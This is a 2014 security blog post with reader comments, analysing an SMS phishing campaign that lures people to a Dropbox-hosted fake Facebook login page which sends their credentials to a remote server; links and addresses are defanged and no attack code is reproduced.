Update, 01 Sept 2014: NUMBERCOP, one of our blog readers, has tipped us off in the comments section about this particular scam resurfacing once again with a new bit.ly URL, which was created last August 31, 2014, a couple of days ago. The number of visitors to that link, as of this writing, seems to have been increasing.
Original post:
click to enlarge
If you happen to receive an SMS message from a potentially unknown recipient with the following text—
wtf f***** remove this pic from Facebook. http://bit[dot]do/fbnudephotos
—much like the fellow on the screenshot above, then you’ve been targeted by a phishing campaign.
The bit.do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
click to enlarge
All links but one–the Get Facebook for iPhone and browse faster. link–lead to a 404 page. The aforementioned link leads to the actual iTunes app download page.
The full code of the page is actually hex encoded and executed by the unescape () function. Partial code looks like this once decoded by an online, free tool:
click to enlarge
Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware.
While this happens at the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con.
click to enlarge
Another thing of note is the bit.ly URL at the bottom of the code:
This is a shortened URL for what we believe is a page that was once a diet scam page, judging from the actual URL string we have encountered before:
click to enlarge
We suspect that this bit.ly URL is included to increase the click-through rate or visits to the page.
Individuals or groups with bad intent have been using SMS as a way to scam people, either for their money or for their information.
Senior Security Researcher Jérôme Segura have published a post entitled “SMS Scams: How To Defend Yourself” back in 2013, which I recommend you, dear Reader, to read as well. His thoughts on this kind of fraud remains relevant to this date.
Other related post/s:
- Uncovering an Android botnet involved in SMS fraud
- Mobile Top-Up Credit Sharing Scams in Circulation
- SMS Activated Flash Downloads: A Digital Leap of Faith
- Porn on YouTube Leads to Premium-Rate SMS Scams
Jovi Umawing
Great analysis! We’ve been tracking this smishing campaign since about 2 weeks. Other associated domains included http://goo[dot]gl/qP13YS and http://goo[dot]gl/SnF9Hz . Awkward traffic patterns on this campaign too. Very untypical for smishing campaigns. We’re tracking 2 dozens of outbound numbers via Level3, This is possibly mobile malware/bot driven.
Thanks for the comment and insights 🙂 I, too, look forward to your research on this similar matter and others. They’re interesting and I’d like to learn more.
Not necessarily directly related to the topic, but I love what you guys are doing. Protecting digital safety is very important. Internet streets need to be protected just as much as the city streets.
Thank you, Iona 🙂 Please keep checking back to the blog to keep yourself informed!